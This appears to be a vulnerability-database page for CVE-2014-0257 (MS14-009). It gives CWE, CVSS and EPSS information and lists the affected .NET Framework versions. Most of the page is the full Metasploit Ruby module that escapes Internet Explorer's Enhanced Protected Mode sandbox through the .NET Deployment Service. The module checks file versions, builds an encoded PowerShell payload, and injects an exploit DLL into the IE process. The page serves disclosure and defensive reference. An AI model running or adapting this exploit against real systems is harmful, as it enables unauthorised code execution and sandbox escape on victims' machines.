Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-20 |
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
9.3 |
|
AV:N/AC:M/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 33892
Publication date : 2014-06-26 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Post::Windows::FileInfo
include Msf::Post::File
NET_VERSIONS = {
'4.5' => {
'dfsvc' => '4.0.30319.17929.17',
'mscorlib' => '4.0.30319.18063.18'
},
'4.5.1' => {
'dfsvc' => '4.0.30319.18408.18',
'mscorlib' => '4.0.30319.18444.18'
}
}
def initialize(info={})
super( update_info( info,
'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape',
'Description' => %q{
This module abuses a process creation policy in the Internet Explorer Sandbox which allows
to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem
exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity
Level. Further interaction with the component allows to escape the Enhanced Protected Mode
and execute arbitrary code with Medium Integrity.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # Vulnerability Discovery and original exploit code
'juan vazquez' # metasploit module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'IE 8 - 11', { } ]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'WfsDelay' => 30
},
'DisclosureDate'=> "Feb 11 2014",
'References' =>
[
['CVE', '2014-0257'],
['MSB', 'MS14-009'],
['BID', '65417'],
['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
]
))
end
def check
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
return Exploit::CheckCode::Unknown
end
net_version = get_net_version
if net_version.empty?
return Exploit::CheckCode::Unknown
end
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
return Exploit::CheckCode::Detected
end
mscorlib_version = get_mscorlib_version
if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Vulnerable
end
def get_net_version
net_version = ""
dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
dfsvc_version = dfsvc_version.join(".")
NET_VERSIONS.each do |k,v|
if v["dfsvc"] == dfsvc_version
net_version = k
end
end
net_version
end
def get_mscorlib_version
mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
mscorlib_version.join(".")
end
def exploit
print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
if mod_handle['return'] == 0
fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
end
unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
end
print_status("Searching .NET Deployment Service (dfsvc.exe)...")
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found")
end
net_version = get_net_version
if net_version.empty?
fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1")
end
print_good(".NET Deployment Service from .NET #{net_version} found.")
print_status("Checking if .NET is patched...")
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)")
end
mscorlib_version = get_mscorlib_version
if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable")
end
print_good(".NET looks vulnerable, exploiting...")
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
temp = get_env('TEMP')
print_status("Loading Exploit Library...")
session.core.load_library(
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
'TargetFilePath' => temp + "\\CVE-2014-0257.dll",
'UploadLibrary' => true,
'Extension' => false,
'SaveToDisk' => false
)
end
def cleanup
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil)
super
end
end
Products Mentioned
Configuraton 0
Microsoft>>.net_framework >> Version 1.0
Microsoft>>.net_framework >> Version 1.1
Microsoft>>.net_framework >> Version 2.0
Microsoft>>.net_framework >> Version 3.5
Microsoft>>.net_framework >> Version 3.5.1
Microsoft>>.net_framework >> Version 4.0
Microsoft>>.net_framework >> Version 4.5
Microsoft>>.net_framework >> Version 4.5.1
References